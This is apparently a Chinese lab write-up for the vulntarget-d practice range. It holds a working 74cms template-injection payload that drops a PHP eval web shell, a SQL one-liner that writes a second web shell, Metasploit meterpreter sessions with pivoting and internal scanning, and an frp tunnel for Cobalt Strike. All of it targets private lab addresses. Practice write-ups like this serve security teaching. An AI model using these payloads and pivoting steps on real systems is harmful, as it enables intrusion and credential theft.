vulntarget开源靶场交流群:
目前已经超过200人,请添加下面的二维码为联系人之后,备注:靶场 进群!(一定要记得备注哦)
相关漏洞技术
下载地址:
百度云链接:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p
下文搭建镜像在vulntarget-d目录下,a/b/c已经发表在星期五实验室公众号,并同步到乌鸦安全公众号文章里,感兴趣的可以关注公众号,后续系列也会发在公众号。
Github:
https://github.com/crow821/vulntarget欢迎多多star,也欢迎加入我们。
-
镜像都是基于VM16做的,没有向下兼容。 -
操作人员自行修改第一层外网IP,将其修改为攻击机可访问IP即可,二层均服务自启。 -
下载靶机,开机之后,确认自己网络配置好了,可以选择本地做一个快照,原本的快照可能会因为制作靶机的处理器和当前打开靶机的处理器不一致,导致快照恢复失败,或者异常(见谅)。
拓扑图
环境配置
密码情况:
ubuntu:eval vulntarget
win7: crow admin
如果网络不对的话,可以使用下面的命令自动获取:
Windows7
靶场设计
3.1 ubuntu
宝塔和服务器的配置
登录宝塔面板:
74cms安装
安装完成
网站前台:http://10.30.2.249:81/
网站后台:http://10.30.2.249:81/index.php?m=admin&c=index&a=login
3.2 win7
打靶流程
4.1 ubuntu
variable=1&tpl= fputs(fopen("tx.php","w"),"<?php eval($_POST[x]);?>"); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>variable=1&tpl=data/Runtime/Logs/Home/22_02_07.loghttp://10.30.2.249:81/tx.php
4.2 msf方法
msf木马上线
msf6 > use exploit/multi/handler[*] Using configured payload generic/shell_reverse_tcpmsf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcppayload => linux/x64/meterpreter/bind_tcpmsf6 exploit(multi/handler) > optionsModule options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (linux/x64/meterpreter/bind_tcp):Name Current Setting Required Description---- --------------- -------- -----------LPORT 4444 yes The listen portRHOST no The target addressExploit target:Id Name-- ----0 Wildcard Targetmsf6 exploit(multi/handler) > set RHOST 10.30.2.249RHOST => 10.30.2.249msf6 exploit(multi/handler) > run[*] Started bind TCP handler against 10.30.2.249:4444[*] Sending stage (3012548 bytes) to 10.30.2.249[*] Meterpreter session 1 opened (10.30.0.248:65194 -> 10.30.2.249:4444 ) at 2022-02-07 11:01:12 +0800
linux提权
设置代理
run post/multi/manage/autoroute
内网扫描
msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcpmsf6 auxiliary(scanner/portscan/tcp) > optionsModule options (auxiliary/scanner/portscan/tcp):Name Current Setting Required Description---- --------------- -------- -----------CONCURRENCY 10 yes The number of concurrent ports to check per hostDELAY 0 yes The delay between connections, per thread, in millisecondsJITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) inmilliseconds.PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900)RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-MetasploitTHREADS 1 yes The number of concurrent threads (max one per host)TIMEOUT 1000 yes The socket connect timeout in millisecondsmsf6 auxiliary(scanner/portscan/tcp) > set PORTS 21,22,23,80,443,8080,3389,445PORTS => 21,22,23,80,443,8080,3389,445msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.20.0/24RHOSTS => 10.0.20.0/24msf6 auxiliary(scanner/portscan/tcp) > run^C[*] 10.0.20.0/24: - Caught interrupt from the console...[*] Auxiliary module execution completedmsf6 auxiliary(scanner/portscan/tcp) > set threads 50threads => 50msf6 auxiliary(scanner/portscan/tcp) > run[*] 10.0.20.0/24: - Scanned 50 of 256 hosts (19% complete)[*] 10.0.20.0/24: - Scanned 52 of 256 hosts (20% complete)[*] 10.0.20.0/24: - Scanned 97 of 256 hosts (37% complete)[+] 10.0.20.131: - 10.0.20.131:80 - TCP OPEN[+] 10.0.20.132: - 10.0.20.132:80 - TCP OPEN[+] 10.0.20.136: - 10.0.20.136:80 - TCP OPEN[+] 10.0.20.136: - 10.0.20.136:445 - TCP OPEN[+] 10.0.20.141: - 10.0.20.141:22 - TCP OPEN[+] 10.0.20.141: - 10.0.20.141:80 - TCP OPEN[*] 10.0.20.0/24: - Scanned 106 of 256 hosts (41% complete)[*] 10.0.20.0/24: - Scanned 128 of 256 hosts (50% complete)[*] 10.0.20.0/24: - Scanned 155 of 256 hosts (60% complete)[*] 10.0.20.0/24: - Scanned 180 of 256 hosts (70% complete)[*] 10.0.20.0/24: - Scanned 210 of 256 hosts (82% complete)[*] 10.0.20.0/24: - Scanned 231 of 256 hosts (90% complete)[*] 10.0.20.0/24: - Scanned 256 of 256 hosts (100% complete)[*] Auxiliary module execution completed
此时证明访问成功,那就继续对该ip进行进一步的端口扫描。
写入一句话:
SELECT '<?php eval($_POST["vuln"]); ?>'
msf6 exploit(multi/handler) > use exploit/multi/handler[*] Using configured payload windows/meterpreter/reverse_tcpsmsf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcppayload => windows/meterpreter/bind_tcpmsf6 exploit(multi/handler) > optionsModule options (exploit/multi/handler):Name Current Setting Required Description---- --------------- -------- -----------Payload options (windows/meterpreter/bind_tcp):Name Current Setting Required Description---- --------------- -------- -----------EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)LPORT 1234 yes The listen portRHOST 10.0.20.136 no The target addressExploit target:Id Name-- ----0 Wildcard Targetmsf6 exploit(multi/handler) > run[*] Started bind TCP handler against 10.0.20.136:1234[*] Sending stage (175174 bytes) to 10.0.20.136[*] Meterpreter session 2 opened (10.0.20.132:53280 -> 10.0.20.136:1234 via session 1) at 2022-02-07 17:55:41 +0800
抓密码
3389远程连接
4.3 Cobalt Strike方法
然后再查看下状态
CS上线
chmod +x frps./frps -c frps.ini
frpc.ini配置
[common]server_addr = 192.168.126.185server_port = 7000[CS_Server_9050]type = tcplocal_ip = 127.0.0.1local_port = 50050remote_port = 9050[test_Beacon_9080]type = tcplocal_ip = 127.0.0.1local_port = 9080remote_port = 9080
攻击机本地执行:
./frpc -c frpc.ini
启用CS
sudo ./teamserver 192.168.126.185 123
在这里CS的服务端为内网ip为ubuntu的ip地址
客户端需要使用转发的9050端口
上线
3389登录上位机
抓取明文
并开启3389
proxifier开启全局代理,然后3389上
登录成功
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论